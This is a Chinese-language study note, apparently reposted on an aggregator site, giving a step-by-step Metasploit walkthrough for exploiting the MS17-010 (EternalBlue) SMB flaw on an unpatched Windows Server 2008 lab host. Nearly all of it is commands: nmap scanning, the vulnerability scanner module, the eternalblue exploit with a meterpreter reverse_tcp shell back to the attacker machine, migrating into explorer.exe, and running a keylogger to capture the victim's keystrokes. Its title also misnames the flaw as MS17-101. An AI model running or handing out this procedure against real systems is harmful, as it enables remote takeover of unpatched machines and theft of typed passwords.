環(huán)境：? ? ? ? 攻擊機(jī)：192.168.200.101? ?//kali Linux 2020

靶機(jī)：192.168.200.103? ? (未打MS17-010補(bǔ)丁windowsServices2008.x64)

1：msfconsole? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //進(jìn)入metaploit

2：nmap -sV 192.168.200.103(檢查445端口是否開放)? ? ? ? //使用nmap探測主機(jī)信息

3：利用msf的auxiliary模塊進(jìn)行漏洞驗(yàn)證

search ms17-010? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //查詢MS17-010永恒之藍(lán)漏洞信息

use??auxiliary/scanner/smb/smb_ms17_010? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?//使用輔助掃描smb，是否存在永恒之藍(lán)漏洞

set??rhost??192.168.200.103? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ???//設(shè)置目標(biāo)IP

set??rport? ?445? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //設(shè)置目標(biāo)端口

run? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???//開始掃描

4：設(shè)置攻擊目標(biāo)、端口、本機(jī)

use??exploit/windows/smb/ms17_010_eternalblue? ? ? ? ? ? ? ?? ?? ? //利用永恒之藍(lán)漏洞

set??rhost??192.168.200.103? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ???//設(shè)置目標(biāo)IP

set??rport? ?445? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?//設(shè)置目標(biāo)端口

set lhost 192.168.200.101? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ? //設(shè)置kali linux IP地址

set??payload? ?windows/x64/meterpreter/reverse_tcp? ? ? ?? ?? ?//使用reverse_tcp攻擊荷載

show options? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???//查看是否設(shè)置完成

run? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? //開始攻擊

若成功則拿到目標(biāo)機(jī)的shell

6：輸入ps查看進(jìn)程

#找到explorer.exe進(jìn)程(記住PID)

PID? ?PPID??Name? ?? ?? ?? ?? ?Arch??Session??User? ?? ?? ?? ?? ?? ?? ?? ???Path

---? ?----??----? ?? ?? ?? ?? ?----??-------??----? ?? ?? ?? ?? ?? ?? ?? ???----

1996??1980??explorer.exe? ?? ? x86? ?0? ?? ???VIOLET\violetevergarden? ?? ? C:\WINDOWS\Explorer.EXE

7：meterpreter > migrate 1996 ? ? ? ? ? ? ? ? ? ? ? ?? ?? ?? ?? ?? ???//遷移會話

8：run post/windows/capture/keylog_recorder? ? ? ? ? ? ? ? //進(jìn)行鍵盤記錄

#鍵盤記錄完成后會生成一個(gè)文件，文件路徑會在攻擊完成后顯示，注意，鍵盤記錄需要按ctel+c結(jié)束。

————有些小伙伴可能在拿到shell后可能會有亂碼這里給予解決方法：輸入命令：chcp 65001 即可

總結(jié)

以上是生活随笔為你收集整理的linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。